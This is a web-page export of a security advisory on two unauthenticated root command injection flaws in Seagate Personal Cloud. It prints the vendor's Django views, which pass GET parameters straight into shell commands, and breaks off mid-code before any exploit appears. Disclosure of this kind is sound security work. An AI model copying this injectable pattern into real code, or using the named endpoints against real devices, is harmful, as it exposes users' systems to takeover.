{"id":11081,"date":"2018-01-11T14:19:13","date_gmt":"2018-01-11T22:19:13","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/01\/11\/news-4852\/"},"modified":"2018-01-11T14:19:13","modified_gmt":"2018-01-11T22:19:13","slug":"news-4852","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/01\/11\/news-4852\/","title":{"rendered":"SSD Advisory \u2013 Seagate Personal Cloud Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 11 Jan 2018 13:45:21 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3548\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3548');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities summary<\/strong><br \/> The following advisory describes two (2) unauthenticated command injection vulnerabilities.<\/p>\n<p>Seagate Personal Cloud Home Media Storage is &#8220;the easiest way to store, organize, stream and share all your music, movies, photos, and important documents.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Yorick Koster, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> Seagate was informed of the vulnerability on October 16, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory<br \/> <span id=\"more-3548\"><\/span><br \/> <strong><u>Vulnerabilities details<\/u><\/strong><br \/> Seagate Media Server uses Django web framework and is mapped to the .psp extension.<\/p>\n<p>Any URL that ends with .psp is automatically send to the Seagate Media Server application using the FastCGI protocol.<br \/> \/etc\/lighttpd\/conf.d\/django-host.conf:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a57e2e1072b9691507112\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> fastcgi.server += (  &#8220;.psp&#8221;=&gt;     ((        &#8220;socket&#8221; =&gt; &#8220;\/var\/run\/manage_py-fastcgi.socket&#8221;,        &#8220;check-local&#8221; =&gt; &#8220;disable&#8221;,        &#8220;stream-post&#8221; =&gt; &#8220;enable&#8221;,        &#8220;allow-x-send-file&#8221; =&gt; &#8220;enable&#8221;,     )),  &#8220;.psp\/&#8221;=&gt;     ((        &#8220;socket&#8221; =&gt; &#8220;\/var\/run\/manage_py-fastcgi.socket&#8221;,        &#8220;check-local&#8221; =&gt; &#8220;disable&#8221;,        &#8220;stream-post&#8221; =&gt; &#8220;enable&#8221;,        &#8220;allow-x-send-file&#8221; =&gt; &#8220;enable&#8221;,     ))  )<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0021 seconds] -->  <\/p>\n<p>URLs are mapped to specific views in the file <em>\/usr\/lib\/django_host\/seagate_media_server\/urls.py<\/em>. <\/p>\n<p>Two views were found to be affected by unauthenticated command injection. <\/p>\n<p>The affected views are:<\/p>\n<ul>\n<li>uploadTelemetry<\/li>\n<li>getLogs<\/li>\n<\/ul>\n<p>These views takes user input from GET parameters and pass these unvalidated\/unsanitized to methods of the commands Python module.<\/p>\n<p>This allows an attacker to inject arbitrary system commands, that will be executed with root privileges.<\/p>\n<p>\/usr\/lib\/django_host\/seagate_media_server\/views.py:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a57e2e1072c4871726970\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> @csrf_exempt  def uploadTelemetry(request):     ts = request.GET.get(&#8216;TimeStamp&#8217;,&#8221;)     if (checkDBSQLite()) :        response = &#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;,&#8221;code&#8221;:&#8221;80&#8243;,&#8221;message&#8221;:&#8221;The Database has not been initialized or mounted yet!&#8221;}&#8217;     else :        if ts == &#8220;&#8221;:           response = &#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;,&#8221;code&#8221;:&#8221;380&#8243;,&#8221;message&#8221;:&#8221;TimeStamp parameter missing&#8221;}&#8217;           return HttpResponse(response);        cmd = &#8220;\/usr\/local\/bin\/log_telemetry &#8220;+str(ts)        commands.getoutput(cmd)     return HttpResponse(&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;}&#8217;)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072c4871726970-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072c4871726970-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072c4871726970-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072c4871726970-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072c4871726970-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072c4871726970-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072c4871726970-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072c4871726970-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072c4871726970-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072c4871726970-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072c4871726970-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072c4871726970-12\">12<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072c4871726970-1\"><span class=\"crayon-sy\">@<\/span><span class=\"crayon-e\">csrf_exempt<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072c4871726970-2\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">uploadTelemetry<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072c4871726970-3\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">ts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">GET<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;TimeStamp&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072c4871726970-4\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">checkDBSQLite<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072c4871726970-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;,&#8221;code&#8221;:&#8221;80&#8243;,&#8221;message&#8221;:&#8221;The Database has not been initialized or mounted yet!&#8221;}&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072c4871726970-6\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072c4871726970-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072c4871726970-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;,&#8221;code&#8221;:&#8221;380&#8243;,&#8221;message&#8221;:&#8221;TimeStamp parameter missing&#8221;}&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072c4871726970-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072c4871726970-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/usr\/local\/bin\/log_telemetry &#8220;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ts<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072c4871726970-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">commands<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getoutput<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072c4871726970-12\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;}&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<p>\/usr\/lib\/django_host\/seagate_media_server\/views.py:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a57e2e1072ca158551842\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> @csrf_exempt  def getLogs (request):     try:        cmd_base=&#8217;\/usr\/bin\/log-extract-manager.sh&#8217;        uID = request.GET.get ( &#8216;arch_id&#8217;, None )        time_stamp = request.GET.get ( &#8216;time_stamp&#8217;, &#8221; )             if uID:           (status, output) = commands.getstatusoutput(cmd_base + &#8216; status &#8216; + uID);           if (&#8216;In progress&#8217; in output) and (uID in output) :              return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;status&#8221;:&#8221;In Progress&#8221;}}&#8217;)           elif (status == 0) :              return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;url&#8221;:&#8221;%s&#8221;, &#8220;fileSize&#8221;:&#8221;%d&#8221;}}&#8217; % ( urllib.quote(output.encode(&#8216;utf-8&#8217;)), os.path.getsize(output) ))           else :              return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;853&#8243;,&#8221;message&#8221;:&#8221;Id not recognized.&#8221;}&#8217; )        else:           (status, output) = commands.getstatusoutput(cmd_base + &#8216; start &#8216; + time_stamp);           if (status == 0) :              return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;archiveID&#8221;:&#8221;%s&#8221;}}&#8217; % (output))             return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;852&#8243;,&#8221;message&#8221;:&#8221;Zip file not created.&#8221;}&#8217; )     except :        return HttpResponse (&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;852&#8243;,&#8221;message&#8221;:&#8221;Zip file not created.&#8221;}&#8217; )<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072ca158551842-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072ca158551842-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072ca158551842-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072ca158551842-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072ca158551842-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072ca158551842-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072ca158551842-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072ca158551842-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072ca158551842-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072ca158551842-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072ca158551842-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072ca158551842-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072ca158551842-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072ca158551842-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072ca158551842-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072ca158551842-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072ca158551842-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072ca158551842-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072ca158551842-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072ca158551842-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072ca158551842-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072ca158551842-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072ca158551842-23\">23<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072ca158551842-1\"><span class=\"crayon-sy\">@<\/span><span class=\"crayon-e\">csrf_exempt<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072ca158551842-2\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">getLogs<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072ca158551842-3\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072ca158551842-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">cmd_base<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;\/usr\/bin\/log-extract-manager.sh&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072ca158551842-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">uID<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">GET<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;arch_id&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">None<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072ca158551842-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">time_stamp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">GET<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;time_stamp&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072ca158551842-7\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072ca158551842-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">uID<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072ca158551842-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">commands<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getstatusoutput<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd_base<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216; status &#8216;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">uID<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072ca158551842-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;In progress&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">uID <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072ca158551842-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;status&#8221;:&#8221;In Progress&#8221;}}&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072ca158551842-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">elif<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072ca158551842-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: 